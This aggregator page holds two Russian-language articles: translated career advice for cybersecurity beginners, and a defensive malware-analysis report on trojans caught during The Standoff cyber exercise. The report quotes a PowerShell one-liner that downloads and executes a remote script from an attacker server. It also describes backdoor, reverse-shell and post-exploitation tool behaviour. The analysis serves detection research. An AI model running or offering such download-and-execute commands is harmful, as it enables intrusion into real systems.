Русский
Русский
English
Статистика
Реклама

Metasploit

Перевод Собираешься работать в кибербезопасности? Прочитай это

28.07.2020 12:21:05 | Автор: admin
Автор статьи Брайан Кребс, известный журналист в сфере информационной безопасности.

Каждый год из колледжей и университетов выходят тысячи выпускников по специальностям информационная безопасность или информатика, абсолютно не подготовленных к реальной работе. Здесь мы посмотрим на результаты недавнего опроса, который выявил самые большие пробелы в навыках выпускников, а также подумаем, как кандидатам на работу выделиться из толпы.



Практически каждую неделю мне приходит минимум одно письмо от читателя, который просит совета, как начать карьеру в сфере ИБ. В большинстве случаев соискатели спрашивают, какие сертификаты им следует получить или у какой специализации самое светлое будущее.

Редко спрашивают, какие практические навыки нужно освоить, чтобы стать более привлекательным кандидатом. Я всегда предупреждаю, что у меня самого нет никаких сертификатов и дипломов, но я регулярно разговариваю с руководителями отделов ИБ и рекрутерами и часто спрашиваю о впечатлениях о современных кандидатах.

Типичный ответ что очень многим кандидатам просто не хватает опыта работы с практическими задачами.

Конечно, большинству выпускников не хватает практического опыта. Но, к счастью, уникальный аспект ИБ заключается в том, что опыт и фундаментальные знания можно получить старым добрым методом проб и ошибок.

Один из ключевых советов изучать основу, как компьютеры и другие устройства взаимодействуют друг с другом. Я говорю это потому, что умение работать в сети фундаментальный навык, на котором строятся многие другие области обучения. Получить работу в сфере безопасности без глубокого понимания того, как работают пакеты данных, немного похожа на попытку стать инженером-химиком, не изучив сначала таблицу Менделеева.

Пожалуйста, не верьте мне на слово. Исследовательский институт SANS недавно провёл опрос более 500 практиков кибербезопасности в 284 различных компаниях в попытке выяснить, какие навыки они находят наиболее полезными для кандидатов на работу, а какие чаще всего отсутствуют.

В ходе опроса респондентам предлагалось ранжировать различные навыки от критических до необязательных. Целых 85% назвали знание сети критическим или очень важным навыком, за которым следует владение операционной системой Linux (77%), Windows (73%), распространённые методы применения эксплоитов (73%), компьютерная архитектура и виртуализация (67%), обработка данных и криптография (58%). Довольно удивительно, что только 39% назвали программирование критическим или очень важным навыком (к этому вернёмся через минуту).

Как специалисты по кибербезопасности оценивали потенциальных кандидатов на работу по этим критическим и очень важным навыкам? Результаты кажутся ошеломляющими:

Навыки Сколько кандидатов не смогли решить даже базовые задачи Сколько кандидатов продемонстрировали мастерство
Общие техники взлома 66% 4,5%
Компьютерные архитектуры 47% 12,5%
Сеть 46% 4%
Linux 40% 14%
Программирование 32% 11,5%
Данные и криптография 30% 2%

Работодатели сообщают, что подготовка студентов по кибербезопасности в значительной степени неадекватна, и они разочарованы, что приходится тратить месяцы на поиски, прежде чем они найдут квалифицированных сотрудников начального уровня, если таковые вообще могут быть найдены, говорит Алан Паллер, директор по исследованиям Института SANS. Мы предположили, что для начала решения этих проблем и устранения разрыва следует сформулировать навыки, которые работодатели ожидают, но не находят у выпускников.

Правда в том, что некоторые из самых умных, проницательных и талантливых специалистов по компьютерной безопасности, которых я знаю, не имеют никаких сертификатов и дипломов по информатике или программированию. На самом деле, многие из них вообще никогда не учились в колледже и не заканчивали университет.

Скорее они попали в безопасность потому, что их страстно и сильно интересовала тема, и это любопытство заставляло как можно больше учиться главным образом, читая, пробуя и делая ошибки (много ошибок).

Я не отговариваю читателей от получения высшего образования или сертификации в данной области (что может быть основным требованием во многих корпорациях), а просто чтобы они не рассматривали это как гарантию стабильной и высокооплачиваемой работы.

Без овладения одним или несколькими из перечисленных навыков вас просто не будут считать очень привлекательным или выдающимся кандидатом.

Но как?


Итак, на чём сосредоточиться и с чего лучше всего начать? Во-первых, хотя существует почти бесконечное количество способов получения знаний и практически нет предела глубинам, которые вы можете исследовать, но самый быстрый способ обучения это запачкать руки.

Я не говорю о взломе чьей-то сети или какого-то плохого сайта. Пожалуйста, не делайте этого без разрешения. Если ломать сторонние сервисы и сайты, то выбирайте те, которые предлагают вознаграждение через программы bug bounty, а затем убедитесь, что соблюдаете правила этих программ.

Но почти всё можно воспроизвести локально. Хотите овладеть общими методами взлома и эксплуатации уязвимостей? Существует бесчисленное множество доступных бесплатных ресурсов; специально разработанные инструменты, такие как Metasploit и WebGoat, и дистрибутивы Linux, такие как Kali Linux, с большим количеством учебников и онлайновых туториалов. Кроме того, есть ряд бесплатных инструментов для пентестинга и обнаружения уязвимостей, такие как Nmap, Nessus, OpenVAS и Nikto. Это далеко не полный список.

Организуйте собственную хакерскую лабораторию. Можете сделать это на запасном компьютере или сервере или на старом ПК, которых в изобилии по дешёвке продаются на eBay или Craigslist. Бесплатные инструменты виртуализации, такие как VirtualBox, упрощают работу с различными операционными системами без необходимости установки дополнительного оборудования.

Или подумайте о том, чтобы заплатить кому-то за установку виртуального сервера, на котором можете ставить опыты. Amazon EC2 хороший недорогой вариант. Если хотите тестировать веб-приложения, можно установить на компьютеры в собственной локальной сети любое количество веб-сервисов, таких как старые версии WordPress, Joomla или движки интернет-магазинов, такие как Magento.

Хотите изучить сети? Начните с приличной книги по TCP/IP, хорошенько изучите сетевой стек и то, как все слои взаимодействуют друг с другом.

Пока усваиваете эту информацию, научитесь использовать некоторые инструменты, которые помогут применить знания на практике. Например, познакомьтесь с Wireshark и Tcpdump, удобными инструментами, используемыми сетевыми администраторами для устранения неполадок сети и безопасности, а также для понимания того, как работают (или не работают) сетевые приложения. Начните с проверки собственного сетевого трафика, просмотра веб-страниц и повседневного использования компьютера. Попытайтесь понять, что делают приложения на вашем компьютере, глядя на то, какие данные они отправляют и получают, как и где.

О программировании


Работодатели могут требовать или не требовать навыки программирования на таких языках, как Go, Java, Perl, Python, C или Ruby. Независимо от этого, знание одного или нескольких языков не только сделает вас более привлекательным кандидатом, но и облегчит дальнейшее обучение и переход на более высокие уровни мастерства.

В зависимости от специализации, в какой-то момент вы можете обнаружить, что возможности дальнейшего обучения ограничены именно пониманием программирования.

Если вас пугает идея изучения языка, начните с основных инструментов командной строки в Linux. Просто научиться писать базовые скрипты для автоматизации рутинных задач уже прекрасный шаг вперёд. Более того, мастерство в создании шелл-скриптов принесёт солидные дивиденды на протяжении всей вашей карьеры практически в любой технической роли, связанной с компьютерами (независимо от того, изучаете вы конкретный язык программирования или нет).

Получите помощь


Не заблуждайтесь: подобно изучению музыкального инструмента или нового языка, приобретение навыков кибербезопасности отнимает много времени и сил. Но не впадайте в уныние, если вас перегружает и подавляет весь объём информации. Просто не торопитесь и продолжайте идти.

Вот почему помогают группы поддержки. Серьёзно. В индустрии ИБ человеческая сторона сетевого взаимодействия принимает форму конференций и локальных встреч. Сложно переоценить, насколько важно для вашего здравомыслия и карьеры общаться с единомышленниками на полурегулярной основе.

Многие из этих мероприятий бесплатны, в том числе встречи BSides, группы DEFCON и собрания OWASP. И поскольку в технологической индустрии по-прежнему преимущественно представлены мужчины, существует ряд встреч по кибербезопасности и групп, ориентированных на женщин, таких как Женское общество Cyberjutsu и другие, перечисленные здесь.

Если вы не живёте в глуши, скорее всего, в вашем районе есть несколько конференций и встреч по ИБ. Но даже если вы в глуши, многие из этих встреч сейчас проводятся виртуально из-за пандемии COVID-19.

Короче говоря, не рассчитывайте, что диплом или сертификат дадут вам навыки, которые работодатели по понятным причинам ожидают от вас. Это может быть несправедливо или нет, но вам придётся развивать и совершенствовать навыки, которые послужат будущему работодателю(-ям) и возможности трудоустройства в этой области.

Уверен, у читателей есть собственные идеи, на чём лучше всего сосредоточить свои усилия новичкам и студентам. Пожалуйста, не стесняйтесь высказываться в комментариях.
Подробнее..

Улов на The Standoff о многообразии пойманных троянов

17.12.2020 20:07:58 | Автор: admin
С 12 по 17 ноября 2020 года на киберполигоне The Standoff прошла крупнейшая битва между командами атакующих и защитников. Действия разворачивались в течение 123 часов в городе FF цифровом двойнике мегаполиса с характерной инфраструктурой: морским портом, аэропортом, нефтяным месторождением, деловым центром, парком развлечений и другими объектами.



Двадцать девять команд атаковали инфраструктуру, добиваясь реализации бизнес-рисков, опасных для различных компаний, работающих в городе, а другие шесть команд мониторили и изучали активность нападающих, тренировали навыки противодействия и расследования инцидентов. В общем, все как в жизни. Хотя кроме нападающих и обороняющихся была еще третья сторона, которая пристально наблюдала за их действиями, глобальный SOC (подробнее о нем читайте в другой нашей статье). Прозванный Большим Братом, SOC объединил несколько команд PT Expert Security Center, которые в режиме нон-стоп анализировали события при помощи специальных средств защиты. Одной из таких команд был отдел обнаружения вредоносного ПО, который с помощью песочницы PT Sandbox вылавливал и исследовал троянские программы редтимеров. Напомним, PT Sandbox может:

сканировать файл правилами PT ESC,
сканировать файл движками внешних антивирусных вендоров,
обнаруживать вредоносную активность после запуска в изолированной среде поведенческими правилами,
анализировать сетевой трафик правилами PT Network Attack Discovery,
анализировать дампы процессов правилами PT ESC.

Сегодня мы расскажем о том, что и как нам удалось поймать, а также о том, какие находки нас особенно впечатлили.


Общая статистика



Во время активных действий на The Standoff (с 12:00 12 ноября и до 15:00 17 ноября) песочница PT Sandbox обнаружила вредоносное ПО в 8609 файлах. Такие файлы поступали в систему анализа двумя способами:

из трафика, перехваченные с помощью PT Network Attack Discovery;
с почтовых серверов в инфраструктуре города FF при анализе вложений в письмах.

Практически половина всех пойманных троянов была найдена в ночь с 15 на 16 ноября.



Мы провели огромную работу по валидации задетектированных объектов, каждый образец мы отнесли к той или иной группе. Иными словами, все зловреды были классифицированы по семействам.



В реальных инфраструктурах не происходит такого обилия атак за единицу времени, как это было во время кибербитвы. Кроме того, профиль атакующих in the wild обширнее: используется больше различных инструментов, в том числе ориентированных на какие-то специфичные действия (скажем, на получения финансовой выгоды или кибершпионаж). Однако с точки зрения представленных классов вредоносного ПО картина вполне правдоподобна. При типовых атаках преобладает использование уязвимостей в популярном софте и промежуточных загрузчиков (stagers) для получения первичного доступа.

Совместим дальнейший анализ получившейся диаграммы с разбором некоторых образцов.

CVE-2018-4993



Практически половину зловредов составили PDF-документы с эксплойтами для уязвимости CVE-2018-4993 в программе Adobe Acrobat Reader. Уязвимость заключается в автоматическом соединении с удаленным сервером по протоколу SMB. В результате такого соединения атакующий может получить Net-NTLM response жертвы на специально подготовленный Net-NTLM challenge.

MD5: 484e1fe323ad4696f252a142d97be2c2



При удачном развитии событий атакующий может восстановить учетные данные жертвы путем перебора возможных значений (брутфорса) или же использовать сетевые соединения для атаки NTLM-relay.

На рисунке ниже представлен пример того, что, собственно, мы и видели при обнаружении вредоносного документа с совершенно безобидным названием goodpdf.pdf.



Отмечу, что за 123 часа мы встретили случаи использования инструмента Responder, который используется атакующими, в частности, для вышеупомянутой атаки NTLM-relay.

MD5: 9bcec68fd23e12e09a89948ae4483e62



Metasploit



Около трети проанализированного ВПО мы отнесли к этой категории. Сюда вошли все вариации полезной нагрузки, сгенерированной с применением Metasploit, популярнейшего проекта для тестов на проникновение не нуждающегося в гиперссылке ;) Добавлю, что здесь посчитаны те случаи, в которых мы не подтвердили использование какой-то конкретной полезной нагрузки. Рассмотрим в качестве примера один из образцов.

MD5: f7a8f6169df5b399cdac045e610b90f1

В сетевом трафике был перехвачен файл с подозрительным именем killerqueen.xlsm. Это офисный документ для Excel нового образца с макросом.



Извлеченный код макроса позволяет судить о запуске нового потока с позиционно независимым кодом сразу после открытия документа.



Получаем дизассемблированный листинг буфера данных, на который передается управление, и убеждаемся в том, что перед нами исполняемый код.





А в байтовом представлении легко улавливаются читаемые строки User Agent, используемого для HTTP-запросов, и IP-адрес атакующих.



Впрочем, образец был обнаружен PT Sandbox из-за использования макроса еще на начальной стадии, до всех этих ухищрений.



Goagent



Тринадцатого ноября в 07:46 по московскому времени мы обнаружили интересный образец. Изначально определенный уровень опасности был выявлен в аномальном сетевом трафике при поведенческом анализе, за счет чего образец получил вердикт трояна-загрузчика. Но гораздо более интересным во время статического анализа было срабатывание специального YARA-правила, которое определяет нелегитимные случаи использования упаковщика UPX.

MD5: 298fc6e08c81e40a166c62bab42459af



Особенность использования упаковщика UPX заключается в отсутствии имен секций, которые проставляет стандартная версия. Тем не менее код упаковщика остался неизменным. Также на рисунке ниже можно заметить еще один артефакт версию 3.96 упаковщика UPX.



Внимательный читатель наверняка обратил внимание на еще один артефакт на рисунке: образец написан на языке Go, повсеместно набирающем популярность.

Проанализировав образец, мы не нашли его исходных кодов в публичных источниках. Тем не менее его возможности соответствуют джентельменскому набору инструмента для удаленного управления ПК жертвы:

создание файлов,
получение текущего каталога,
получение содержимого текущего каталога,
смена каталога,
загрузка данных на компьютер жертвы,
выгрузка данных с компьютера жертвы,
выполнение команд через shell (cmd.exe в случае Windows),
шифрование данных, отправляемых на управляющий сервер, с помощью RC4.





Стоит сказать, что этот бэкдор может выполнять и роль прокси: через каналы Go он может принимать и отправлять данные на управляющий сервер, играя роль оркестратора для дополнительных плагинов, расширяющих его возможности.

Отмечу, что мы оперативно проанализировали этот бэкдор, усовершенствовали поведенческие правила и благополучно обнаруживали прочие его модификации при поведенческом анализе.



Конечно же, мы обнаружили аналогичную версию трояна, но скомпилированную уже под Linux, причем с той же особенностью: несмотря на упаковку, в PE-заголовке также отсутствует упоминание об UPX. Вот вам наглядное преимущество использования языка программирования с кросс-компилируемостью!

Прочие, но не менее интересные



Бегло пройдемся по некоторым другим семействам, образцов в которых было значительно меньше, но они от этого ничуть не менее любопытны.

MD5: f198d4402dc38620c5a75067a0ed568a

Еще один бэкдор на Go. На этот раз, правда, не упакованный, но зато все используемые строки закодированы операцией XOR с ключом, длина которого совпадает с длиной строки.



После деобфускации мы установили, что это вариация общедоступного фреймворка для постэксплуатации Sliver с частично урезанными возможностями взаимодействия с управляющим сервером.

Еще один образец был получен при следующей цепочке действий. На анализ попал однострочный скрипт для PowerShell:

powershell -c IEX(New-Object System.Net.WebClient).DownloadString('http://*.*.34.54:8000/s5.ps1')

В результате запуска с управляющего сервера был получен снова скрипт PowerShell, но значительно большего размера.



Полезная нагрузка сжата с помощью Deflate и вновь закодирована Base64.



В результате получен имплант постэксплуатационного фреймфорка на .NET Covenant.

MD5: 8a97322e3c0245c57b231417b060eec9



А вот пример минималистичного, но работоспособного реверс-шелла на PowerShell.
MD5: aaebe541fa164e77e2f90c9e67dbbaca



Просто, но эффективно.

Конечно, мы не могли не отметить инструменты для продвижения внутри сети SharpHound и Rubeus.

MD5: 513d35b572b05caa1571a48db1ae24de



MD5: 98382aae04b763f096a3b868d9ba70fe



Отдельный интерес представляло наблюдение за тем, какую фантазию проявляли атакующие по части названий:



***
Итак, если подводить итоги нашей работы и работы нашего инструментария во время The Standoff, то:

в каждом третьем случае совокупность антивирусных движков трех внешних вендоров пропустила вредоносное ПО;
технологии статического и поведенческого детекта PT ESC не только существенно дополнили комбинацию классических средств защиты, но и показали достойный уровень обнаружения.



Фактически эта картина очередной раз подтверждает, что использование различных экспертных знаний, технологий, подходов к обнаружению существенно повышает уровень обнаружения вредоносного ПО. Эта же мысль относится и к использованию совокупности решений различных классов, которое повышает уровень информационной безопасности в целом.

Автор: Алексей Вишняков, руководитель отдела обнаружения вредоносного ПО компании Positive Technologies
Подробнее..

Категории

Последние комментарии

  • Имя: Макс
    24.08.2022 | 11:28
    Я разраб в IT компании, работаю на арбитражную команду. Мы работаем с приламы и сайтами, при работе замечаются постоянные баны и лаги. Пацаны посоветовали сервис по анализу исходного кода,https://app Подробнее..
  • Имя: 9055410337
    20.08.2022 | 17:41
    поможем пишите в телеграм Подробнее..
  • Имя: sabbat
    17.08.2022 | 20:42
    Охренеть.. это просто шикарная статья, феноменально круто. Большое спасибо за разбор! Надеюсь как-нибудь с тобой связаться для обсуждений чего-либо) Подробнее..
  • Имя: Мария
    09.08.2022 | 14:44
    Добрый день. Если обладаете такой информацией, то подскажите, пожалуйста, где можно найти много-много материала по Yggdrasil и его уязвимостях для написания диплома? Благодарю. Подробнее..
© 2006-2024, personeltest.ru